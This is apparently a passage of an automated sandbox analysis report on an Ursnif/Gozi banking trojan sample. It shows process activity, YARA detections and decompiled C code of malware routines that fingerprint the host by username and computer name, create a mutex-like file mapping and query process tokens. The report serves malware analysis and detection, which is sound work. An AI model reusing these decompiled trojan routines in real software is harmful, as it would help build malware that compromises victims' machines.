                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: control.exe PID: 5116 Parent PID: 6132

                            General

                            Start time:10:22:11
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, Author: CCN-CERT

                            Chronological Activities

                            Analysis Process: csc.exe PID: 1472 Parent PID: 6448

                            General

                            Start time:10:22:11
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: cvtres.exe PID: 4928 Parent PID: 4904

                            General

                            Start time:10:22:13
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: csc.exe PID: 3760 Parent PID: 5784

                            General

                            Start time:10:22:15
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: cvtres.exe PID: 6428 Parent PID: 1472

                            General

                            Start time:10:22:15
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Disassembly

                            Code Analysis

                            Reset < >

                              Analysis Process: loaddll32.exe PID: 6132 Parent PID: 2040 loaddll32.exeCOMMON

                              Executed Functions

                              Function 01024D95, Relevance: 37.8, APIs: 25, Instructions: 331memorylibrarynativeCOMMON
                              Download Yara Rule
                              APIs
                              • RtlInitializeCriticalSection.NTDLL(01050488), ref: 01024DB3
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • memset.NTDLL ref: 01024DE4
                              • RtlInitializeCriticalSection.NTDLL(04B3C0A0), ref: 01024DF5
                                • Part of subcall function 010445CE: RtlInitializeCriticalSection.NTDLL(01050460), ref: 010445F2
                                • Part of subcall function 010445CE: RtlInitializeCriticalSection.NTDLL(01050440), ref: 01044608
                                • Part of subcall function 010445CE: GetVersion.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01044619
                                • Part of subcall function 010445CE: GetModuleHandleA.KERNEL32(00001597,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 0104464D
                                • Part of subcall function 0103465E: RtlAllocateHeap.NTDLL(00000000,-00000003,77E49EB0), ref: 01034678
                              • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000060,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 01024E1E
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024E2F
                              • CloseHandle.KERNEL32(00000768,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024E43
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 01024E8C
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 01024E9F
                              • GetUserNameA.ADVAPI32(00000000,?), ref: 01024EB4
                              • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 01024EE4
                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01024EF9
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024F03
                              • CloseHandle.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01024F10
                              • GetShellWindow.USER32 ref: 01024F2B
                              • GetWindowThreadProcessId.USER32(00000000), ref: 01024F32
                              • memcpy.NTDLL(01050354,?,00000018,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 01024F6E
                              • CreateEventA.KERNEL32(01050244,00000001,00000000,00000000,?,00000001,?,00000000), ref: 01024FEC
                              • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 01025016
                              • OpenEventA.KERNEL32(00100000,00000000,04B3B9D0,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?), ref: 0102503E
                              • CreateEventA.KERNEL32(01050244,00000001,00000000,04B3B9D0,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 01025053
                              • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 01025059
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,0103940A,?,?,?), ref: 010250F1
                              • SetEvent.KERNEL32(?,Function_000115C8,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0103940A), ref: 01025187
                              • RtlAllocateHeap.NTDLL(00000000,00000043,Function_000115C8), ref: 0102519C
                              • wsprintfA.USER32 ref: 010251CC
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: AllocateHeap$CriticalEventInitializeSection$CreateErrorHandleLastProcess$CloseNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                              • String ID:
                              • API String ID: 3929413950-0
                              • Opcode ID: ad9d325cb3b878ee6d2c19339ca3c90922d1b22c907cc79acdc83947fba0a7a6
                              • Instruction ID: b0f6747f33c1329a79f4475472e90ce74a0710a55bce66046cad17fa2b65f947
                              • Opcode Fuzzy Hash: ad9d325cb3b878ee6d2c19339ca3c90922d1b22c907cc79acdc83947fba0a7a6
                              • Instruction Fuzzy Hash: F6C19AB45403169FC7A0DF69D88896FBBE8FB85700B40485EF5C6C7148DB3A9808CB66
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013EA303, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102memoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 96%
                              			E013EA303(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x13ed2a8; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E013E7855( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x13ed2b4 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x13ed270, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E013E47A4(_v8 + _v8, _t63);
							}
							HeapFree( *0x13ed270, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x13ed270, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E013E47A4(_v8 + _v8, _t63);
						}
						HeapFree( *0x13ed270, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                              0x013ea303
                              0x013ea30b
                              0x013ea311
                              0x013ea314
                              0x013ea317
                              0x013ea319
                              0x013ea31e
                              0x013ea31e
                              0x013ea324
                              0x013ea326
                              0x013ea333
                              0x013ea394
                              0x013ea335
                              0x013ea33a
                              0x013ea340
                              0x013ea345
                              0x013ea353
                              0x013ea357
                              0x013ea366
                              0x013ea36d
                              0x013ea374
                              0x013ea374
                              0x013ea37f
                              0x013ea37f
                              0x013ea357
                              0x013ea345
                              0x013ea396
                              0x013ea39c
                              0x013ea3a6
                              0x013ea3a8
                              0x013ea3ad
                              0x013ea3bc
                              0x013ea3c0
                              0x013ea3cb
                              0x013ea3d2
                              0x013ea3d9
                              0x013ea3d9
                              0x013ea3e5
                              0x013ea3e5
                              0x013ea3c0
                              0x013ea3ee
                              0x013ea3f0
                              0x013ea3f3
                              0x013ea3f5
                              0x013ea3f8
                              0x013ea3fb
                              0x013ea405
                              0x013ea409
                              0x013ea40d

                              APIs
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 013EA33A
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 013EA351
                              • GetUserNameW.ADVAPI32(00000000,?), ref: 013EA35E
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013EA37F
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 013EA3A6
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 013EA3BA
                              • GetComputerNameW.KERNEL32(00000000,00000000), ref: 013EA3C7
                              • HeapFree.KERNEL32(00000000,00000000), ref: 013EA3E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: HeapName$AllocateComputerFreeUser
                              • String ID: Uxt
                              • API String ID: 3239747167-1536154274
                              • Opcode ID: ff00bc941894ab1b730e9d8cade9225f0e2e1a562c6a32c64fae165ff2528d93
                              • Instruction ID: 1fb3e4921e7d455aa4a43c343ee5f98a9ca32043660c590a8ede8d4616899c5e
                              • Opcode Fuzzy Hash: ff00bc941894ab1b730e9d8cade9225f0e2e1a562c6a32c64fae165ff2528d93
                              • Instruction Fuzzy Hash: 23311471A00309EFDB21DFA9D985A6EBBF9FB48314F258469E505DB280E770EA019B10
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E5C7F, Relevance: 13.6, APIs: 9, Instructions: 72filetimeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 74%
                              			E013E5C7F(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L013EB02A();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x13ed2b8; // 0x26ea5a8
				_t5 = _t13 + 0x13ee876; // 0x3ad8e1e
				_t6 = _t13 + 0x13ee59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L013EAD4A();
				_t17 = CreateFileMappingW(0xffffffff, 0x13ed2e4, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                              0x013e5c7f
                              0x013e5c87
                              0x013e5c8b
                              0x013e5c91
                              0x013e5c96
                              0x013e5c9b
                              0x013e5c9e
                              0x013e5ca1
                              0x013e5ca6
                              0x013e5ca7
                              0x013e5caa
                              0x013e5caf
                              0x013e5cb6
                              0x013e5cc0
                              0x013e5cc2
                              0x013e5cc3
                              0x013e5cc6
                              0x013e5ce2
                              0x013e5ce8
                              0x013e5cec
                              0x013e5d3a
                              0x013e5cee
                              0x013e5cfb
                              0x013e5d0b
                              0x013e5d13
                              0x013e5d25
                              0x013e5d29
                              0x00000000
                              0x00000000
                              0x013e5d15
                              0x013e5d18
                              0x013e5d1d
                              0x013e5d1f
                              0x013e5d1f
                              0x013e5cfd
                              0x013e5cff
                              0x013e5d2b
                              0x013e5d2c
                              0x013e5d2c
                              0x013e5cfb
                              0x013e5d41

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53,?,?), ref: 013E5C8B
                              • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 013E5CA1
                              • _snwprintf.NTDLL ref: 013E5CC6
                              • CreateFileMappingW.KERNELBASE(000000FF,013ED2E4,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 013E5CE2
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53,?), ref: 013E5CF4
                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 013E5D0B
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53), ref: 013E5D2C
                              • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,013E590B,?,?,4D283A53,?), ref: 013E5D34
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                              • String ID:
                              • API String ID: 1814172918-0
                              • Opcode ID: b4670559ec4cf1354d2b558edc7200a55618ae24e5de81d2695554c0f5defd28
                              • Instruction ID: 707b202492b3e9eef34372460667334d5d99d200ba7286130dea8c58507e5e39
                              • Opcode Fuzzy Hash: b4670559ec4cf1354d2b558edc7200a55618ae24e5de81d2695554c0f5defd28
                              • Instruction Fuzzy Hash: 62218176A00318BBD731EB68DC0DF9E7BFDAB58718F104121F605EA2D5DA71D9058B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 010392F6, Relevance: 10.6, APIs: 7, Instructions: 113stringCOMMON
                              Download Yara Rule
                              APIs
                              • StrRChrA.SHLWAPI(04B3B5B0,00000000,0000005C,?,?,?), ref: 01039332
                              • _strupr.NTDLL ref: 01039348
                              • lstrlen.KERNEL32(04B3B5B0,?,?), ref: 01039350
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 010393D0
                              • RtlAddVectoredExceptionHandler.NTDLL(00000000,010337EE), ref: 010393F7
                              • GetLastError.KERNEL32(?,?), ref: 01039411
                              • RtlRemoveVectoredExceptionHandler.NTDLL(00F9D858), ref: 01039427
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: ExceptionHandlerVectored$CreateErrorEventLastRemove_struprlstrlen
                              • String ID:
                              • API String ID: 2251957091-0
                              • Opcode ID: 06ba6ba0abc3f6e10ab4bfd1fb2167c371d89cae4c405f172256aded0abc01a8
                              • Instruction ID: 093da61855f995bbe9f76def2ab4b56485dfd581ddbd33be19b5f96864e40794
                              • Opcode Fuzzy Hash: 06ba6ba0abc3f6e10ab4bfd1fb2167c371d89cae4c405f172256aded0abc01a8
                              • Instruction Fuzzy Hash: 1F312AB2A042209FEB71AFBCE8C496F7BECB744344B054479FAD2D3188DA7A88408755
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102B0A5, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                              Download Yara Rule
                              APIs
                              • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 0102B0EC
                              • NtOpenProcessToken.NTDLL(?,00000008,?), ref: 0102B0FF
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,?), ref: 0102B11B
                                • Part of subcall function 0103032D: RtlAllocateHeap.NTDLL(00000000,?,010424D0), ref: 01030339
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,?,?), ref: 0102B138
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 0102B145
                              • NtClose.NTDLL(?), ref: 0102B157
                              • NtClose.NTDLL(?), ref: 0102B161
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: c41da6558a24637ae5b4e75c2712f0c8de218a53684d37ceb8b677bacc2d8c30
                              • Instruction ID: 8f736a227dcb8a98eb558af777bd0a4db0f79e59b84235f9e2bf30e3d05fdd10
                              • Opcode Fuzzy Hash: c41da6558a24637ae5b4e75c2712f0c8de218a53684d37ceb8b677bacc2d8c30
                              • Instruction Fuzzy Hash: 9F2148B6A00229FBDF119FA4CD85ADEBFBDEF08740F104026FA45E6110D7768A549BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 013E6C06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                              Download Yara Rule
                              C-Code - Quality: 38%
                              			E013E6C06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E013E55DC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E013E6DFA(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                              0x013e6c13
                              0x013e6c14
                              0x013e6c15
                              0x013e6c16
                              0x013e6c17
                              0x013e6c1b
                              0x013e6c22
                              0x013e6c31
                              0x013e6c34
                              0x013e6c37
                              0x013e6c3e
                              0x013e6c41
                              0x013e6c44
                              0x013e6c47
                              0x013e6c4a
                              0x013e6c55
                              0x013e6c57
                              0x013e6c60
                              0x013e6c68
                              0x013e6c6a
                              0x013e6c7c
                              0x013e6c86
                              0x013e6c8a
                              0x013e6c99
                              0x013e6c9d
                              0x013e6ca6
                              0x013e6cae
                              0x013e6cae
                              0x013e6cb0
                              0x013e6cb0
                              0x013e6cb8
                              0x013e6cbe
                              0x013e6cc2
                              0x013e6cc2
                              0x013e6ccd

                              APIs
                              • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 013E6C4D
                              • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 013E6C60
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 013E6C7C
                                • Part of subcall function 013E55DC: RtlAllocateHeap.NTDLL(00000000,00000000,013E552C), ref: 013E55E8
                              • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 013E6C99
                              • memcpy.NTDLL(?,00000000,0000001C), ref: 013E6CA6
                              • NtClose.NTDLL(?), ref: 013E6CB8
                              • NtClose.NTDLL(00000000), ref: 013E6CC2
                              Memory Dump Source
                              • Source File: 00000000.00000002.655495954.00000000013E1000.00000020.00020000.sdmp, Offset: 013E0000, based on PE: true
                              • Associated: 00000000.00000002.655418004.00000000013E0000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655701530.00000000013EC000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655806217.00000000013ED000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.655861835.00000000013EF000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                              • String ID:
                              • API String ID: 2575439697-0
                              • Opcode ID: bfc3c128190c0287929970405a6e924f51273e84ffa493e9c5b76928cf78e109
                              • Instruction ID: 3bc0cec0f7562a90a6ab7a47d74e38ef73332e4fc93368eedbada8453a35c0ce
                              • Opcode Fuzzy Hash: bfc3c128190c0287929970405a6e924f51273e84ffa493e9c5b76928cf78e109
                              • Instruction Fuzzy Hash: 8B2136B2900229FBDF119F99CC459DEBFBDEF18744F104026FA01EA190D7719A50DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0103D9F4, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0103DA1F
                              • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 0103DA2C
                              • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 0103DAB8
                              • GetModuleHandleA.KERNEL32(00000000), ref: 0103DAC3
                              • RtlImageNtHeader.NTDLL(00000000), ref: 0103DACC
                              • RtlExitUserThread.NTDLL(00000000), ref: 0103DAE1
                                • Part of subcall function 010322F0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0103DA5A,?), ref: 010322F8
                                • Part of subcall function 010322F0: GetVersion.KERNEL32 ref: 01032307
                                • Part of subcall function 010322F0: GetCurrentProcessId.KERNEL32 ref: 0103231E
                                • Part of subcall function 010322F0: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 0103233B
                                • Part of subcall function 0102E0B6: memcpy.NTDLL(00000000,?,?,?), ref: 0102E115
                                • Part of subcall function 01044BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,01023E20), ref: 01044BF0
                                • Part of subcall function 010254B6: GetModuleHandleA.KERNEL32(?,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 010254D7
                                • Part of subcall function 010254B6: GetProcAddress.KERNEL32(00000000,?), ref: 010254F0
                                • Part of subcall function 010254B6: OpenProcess.KERNEL32(00000400,00000000,01033B88,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102550D
                                • Part of subcall function 010254B6: IsWow64Process.KERNEL32(00000000,00000000,010501F4,?,?,?,01033B88,00000000,010501F4,?,00000000), ref: 0102551E
                                • Part of subcall function 010254B6: CloseHandle.KERNEL32(00000000,?,?,01033B88,00000000,010501F4,?,00000000), ref: 01025531
                              Memory Dump Source
                              • Source File: 00000000.00000002.654376691.0000000001020000.00000040.00020000.sdmp, Offset: 01020000, based on PE: false
                              Similarity
                              • API ID: Process$HandleModule$CreateFileOpenThreadTime$AddressCloseCurrentEventExitHeaderHeapImageInformationNameProcQuerySystemUserVersionWow64memcpy
                              • String ID:
                              • API String ID: 3675227105-0
                              • Opcode ID: 4136cd86c578fe905fd097e8cd962b1cdbadf60146e870b35f34607104ec2f83
                              • Instruction ID: 1769c50b3d23d9d24842fc19de851d38b606142c442bf9ae8fc063d022a1dc93
                              • Opcode Fuzzy Hash: 4136cd86c578fe905fd097e8cd962b1cdbadf60146e870b35f34607104ec2f83
                              • Instruction Fuzzy Hash: DB31E3B1A40614EFD722EFA8DEC4AAE7BBCEB84740F504168F582E7245D738C941C790
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0102D551, Relevance: 7.7, APIs: 5, Instructions: 227nativeCOMMON
                              Download Yara Rule
                              APIs
                              • memcpy.NTDLL(01033C59,01026017,00000800,01033C99,01033C99,?,00000000), ref: 0102D78F
                                • Part of subcall function 01029704: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,0102D660,?,?,01033C99,?,00000000), ref: 01029729
                                • Part of subcall function 01029704: GetProcAddress.KERNEL32(00000000,?), ref: 0102974B
